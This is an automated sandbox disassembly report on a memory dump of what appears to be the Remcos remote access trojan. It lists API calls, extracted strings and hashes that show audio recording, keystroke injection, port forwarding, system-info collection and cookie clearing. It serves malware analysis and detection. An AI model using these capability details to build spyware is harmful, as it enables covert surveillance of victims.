                                                                                                • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                                                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                • API String ID: 489098229-3790400642
                                                                                                • Opcode ID: af4cd6d10bda7ff1b9bb4239446f4407f1b7e606fded6ef68a99ac04b8ddb70e
                                                                                                • Instruction ID: ac563f1b8c988fbcbdb25ffa0f060f034023d1de15a29d9718e9897573209577
                                                                                                • Opcode Fuzzy Hash: af4cd6d10bda7ff1b9bb4239446f4407f1b7e606fded6ef68a99ac04b8ddb70e
                                                                                                • Instruction Fuzzy Hash: 3F518E70A00215AACB14BBB5C8529FD77A9AF54308F40403FF509AB1E2EF7C4D85C799
                                                                                                APIs
                                                                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DecodePointer
                                                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                • API String ID: 3527080286-3064271455
                                                                                                • Opcode ID: d3e7b15c46cdd208759493adff4216d8049d52db36716e3e1ce652e173acd39f
                                                                                                • Instruction ID: 9e278d4a377d0ea10dd73248deb0d867b2e8f6339126d6964ada8e5ca1a1e79f
                                                                                                • Opcode Fuzzy Hash: d3e7b15c46cdd208759493adff4216d8049d52db36716e3e1ce652e173acd39f
                                                                                                • Instruction Fuzzy Hash: AA515071900909DBCB10DF58E9481BDBBB0FB49306F924197D841A7296DB798928CB1E
                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                                • Sleep.KERNEL32(00000064), ref: 0041755C
                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                • API String ID: 1462127192-2001430897
                                                                                                • Opcode ID: 91115a630abed841a883f8823191e2b1499a4e339edc73cf2967208c6af6f964
                                                                                                • Instruction ID: 4d831fdf2c11e0d815db77489a542135a470e493f6e320739c61594aa9f7fbeb
                                                                                                • Opcode Fuzzy Hash: 91115a630abed841a883f8823191e2b1499a4e339edc73cf2967208c6af6f964
                                                                                                • Instruction Fuzzy Hash: A4313D71940119AADB04FBA1DC96DED7739AF50309F00017EF606731E2EF785A8ACA9C
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                                                                • int.LIBCPMT ref: 00410EBC
                                                                                                  • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                  • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                                                                • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                                • String ID: <kG$@kG
                                                                                                • API String ID: 3815856325-1261746286
                                                                                                • Opcode ID: cc4f498f03e49cc8175e06c4afa4c34db09ac51f823a1e2d31623f5746c52272
                                                                                                • Instruction ID: 0588f859592fb32d2b707c82d02c9514845f82bff388d80d729849e078334d39
                                                                                                • Opcode Fuzzy Hash: cc4f498f03e49cc8175e06c4afa4c34db09ac51f823a1e2d31623f5746c52272
                                                                                                • Instruction Fuzzy Hash: 622107329005249BCB14FBAAD8429DE7769DF48324F21416FF904E72D1DBB9AD818BDC
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                                                  • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                                                  • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                                                  • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                                                                • lstrcpynA.KERNEL32(00474B70,Remcos,00000080), ref: 0041D558
                                                                                                • Shell_NotifyIconA.SHELL32(00000000,00474B58), ref: 0041D56E
                                                                                                • TranslateMessage.USER32(?), ref: 0041D57A
                                                                                                • DispatchMessageA.USER32(?), ref: 0041D584
                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                • String ID: Remcos
                                                                                                • API String ID: 1970332568-165870891
                                                                                                • Opcode ID: 731e0475cdd51c62647780fa2fa3280f65193767bc99efc51189d173a824088e
                                                                                                • Instruction ID: c2fc9e39e559a2afed00746d39c192473857db467f2681b349ddfe36236392a3
                                                                                                • Opcode Fuzzy Hash: 731e0475cdd51c62647780fa2fa3280f65193767bc99efc51189d173a824088e
                                                                                                • Instruction Fuzzy Hash: 11015EB1840348EBD7109FA1EC4CFABBBBCABC5705F00406AF505921A1D7B8E885CB6D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                                                                                • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                                                                • Opcode Fuzzy Hash: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                                                                                • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                                                                APIs
                                                                                                • GetCPInfo.KERNEL32(?,?), ref: 00453EAF
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453F32
                                                                                                • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00453FC5
                                                                                                • __alloca_probe_16.LIBCMT ref: 00454014
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453FDC
                                                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00454058
                                                                                                • __freea.LIBCMT ref: 00454083
                                                                                                • __freea.LIBCMT ref: 0045408F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                • String ID:
                                                                                                • API String ID: 201697637-0
                                                                                                • Opcode ID: 60ef2ba7967959a3bb5abb213fcabd91113b8325e5b7fdcf5ca33ed2e0ecdaf3
                                                                                                • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                                                                • Opcode Fuzzy Hash: 60ef2ba7967959a3bb5abb213fcabd91113b8325e5b7fdcf5ca33ed2e0ecdaf3
                                                                                                • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                                                                APIs
                                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                                                                • _free.LIBCMT ref: 00445515
                                                                                                • _free.LIBCMT ref: 0044552E
                                                                                                • _free.LIBCMT ref: 00445560
                                                                                                • _free.LIBCMT ref: 00445569
                                                                                                • _free.LIBCMT ref: 00445575
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                • String ID: C
                                                                                                • API String ID: 1679612858-1037565863
                                                                                                • Opcode ID: 6f1d39b58dd635c4ed11e96029a3cbcd4864377c401e683a9a2b4ff7d9f0077f
                                                                                                • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                                                                • Opcode Fuzzy Hash: 6f1d39b58dd635c4ed11e96029a3cbcd4864377c401e683a9a2b4ff7d9f0077f
                                                                                                • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: tcp$udp
                                                                                                • API String ID: 0-3725065008
                                                                                                • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                                                                • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Eventinet_ntoa
                                                                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                                                                • API String ID: 3578746661-168337528
                                                                                                • Opcode ID: 2f385a75159af1027d885fa0c49e9949be3658d4e5c79a28fda3805584dfcd00
                                                                                                • Instruction ID: cd9a01f22de2d9f6a9994d78948339ea64d6c0f71f497d0a384e35af32d82467
                                                                                                • Opcode Fuzzy Hash: 2f385a75159af1027d885fa0c49e9949be3658d4e5c79a28fda3805584dfcd00
                                                                                                • Instruction Fuzzy Hash: 0E51C531A042015BC724FB36D95AAAE36A5AB80344F40453FF606576F2EF7C8985C7DE
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EF0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                                                                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                                                                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                                                  • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474F08,00404C49,00000000,?,?,?,00474F08,?), ref: 00404BA5
                                                                                                  • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                • String ID: .part
                                                                                                • API String ID: 1303771098-3499674018
                                                                                                • Opcode ID: 2cd47226940962a122a5225dbb7bcfdd0251b599784bc95ccd90888c348ec43d
                                                                                                • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                                                                • Opcode Fuzzy Hash: 2cd47226940962a122a5225dbb7bcfdd0251b599784bc95ccd90888c348ec43d
                                                                                                • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                                                                APIs
                                                                                                • _strftime.LIBCMT ref: 00401BD4
                                                                                                  • Part of subcall function 00401CE9: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401D55
                                                                                                • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401C86
                                                                                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CC4
                                                                                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CD3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                • String ID: %Y-%m-%d %H.%M$.wav$tMG
                                                                                                • API String ID: 3809562944-3627046146
                                                                                                • Opcode ID: 92e028a72761fe09c9e15705bebed9d7aaee4e34048397f944afe691d3eaace1
                                                                                                • Instruction ID: 77224d9c3c18060e3821781750c24aeed92f5db76bec914a8a88ddbccf287b9a
                                                                                                • Opcode Fuzzy Hash: 92e028a72761fe09c9e15705bebed9d7aaee4e34048397f944afe691d3eaace1
                                                                                                • Instruction Fuzzy Hash: 5F3181315043019FC325EB62DD46A9A77A8FB84319F40443EF149A31F2EFB89949CB9A
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                                                                • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                                                                • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                                                                • __freea.LIBCMT ref: 0044AEB0
                                                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                • __freea.LIBCMT ref: 0044AEB9
                                                                                                • __freea.LIBCMT ref: 0044AEDE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3864826663-0
                                                                                                • Opcode ID: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                                                                                • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                                                                • Opcode Fuzzy Hash: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                                                                                • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                                                                APIs
                                                                                                • SendInput.USER32 ref: 00419A25
                                                                                                • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                                                                • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                                                  • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InputSend$Virtual
                                                                                                • String ID:
                                                                                                • API String ID: 1167301434-0
                                                                                                • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                                                                • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __freea$__alloca_probe_16_free
                                                                                                • String ID: a/p$am/pm$h{D
                                                                                                • API String ID: 2936374016-2303565833
                                                                                                • Opcode ID: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                                                                                • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                                                                • Opcode Fuzzy Hash: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                                                                                • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                                                                APIs
                                                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                • _free.LIBCMT ref: 00444E87
                                                                                                • _free.LIBCMT ref: 00444E9E
                                                                                                • _free.LIBCMT ref: 00444EBD
                                                                                                • _free.LIBCMT ref: 00444ED8
                                                                                                • _free.LIBCMT ref: 00444EEF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$AllocateHeap
                                                                                                • String ID: KED
                                                                                                • API String ID: 3033488037-2133951994
                                                                                                • Opcode ID: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                                                                                • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                                                                • Opcode Fuzzy Hash: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                                                                                • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                                                                APIs
                                                                                                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                                                                                • __fassign.LIBCMT ref: 0044B4F9
                                                                                                • __fassign.LIBCMT ref: 0044B514
                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                                                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B559
                                                                                                • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B592
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 1324828854-0
                                                                                                • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                                                                • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                                                                APIs
                                                                                                • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                                • ExitThread.KERNEL32 ref: 004018F6
                                                                                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EF0,00000000), ref: 00401A04
                                                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                • String ID: `kG$hMG$kG
                                                                                                • API String ID: 1649129571-3851552405
                                                                                                • Opcode ID: a5ba242c8c709f1fd36122b2fcda02690f5f2dde985b3253a2c79e6b1374742b
                                                                                                • Instruction ID: dc699b77c08b599092ddf19de7d80486fcd8c0a7edd7622242773fc29a9484b7
                                                                                                • Opcode Fuzzy Hash: a5ba242c8c709f1fd36122b2fcda02690f5f2dde985b3253a2c79e6b1374742b
                                                                                                • Instruction Fuzzy Hash: 3441C2312042009BC324FB36DD96ABE73A6AB85354F00453FF54AA61F1DF38AD4AC61E
                                                                                                APIs
                                                                                                  • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750F4), ref: 00413678
                                                                                                  • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                                  • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                • _wcslen.LIBCMT ref: 0041B7F4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                                • String ID: .exe$HSG$http\shell\open\command$program files (x86)\$program files\
                                                                                                • API String ID: 37874593-930133217
                                                                                                • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                                • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                                                                • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                                • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                                                                APIs
                                                                                                  • Part of subcall function 004135E1: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                  • Part of subcall function 004135E1: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                                                  • Part of subcall function 004135E1: RegCloseKey.KERNELBASE(?), ref: 0041362D
                                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                                                                • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                • API String ID: 1133728706-4073444585
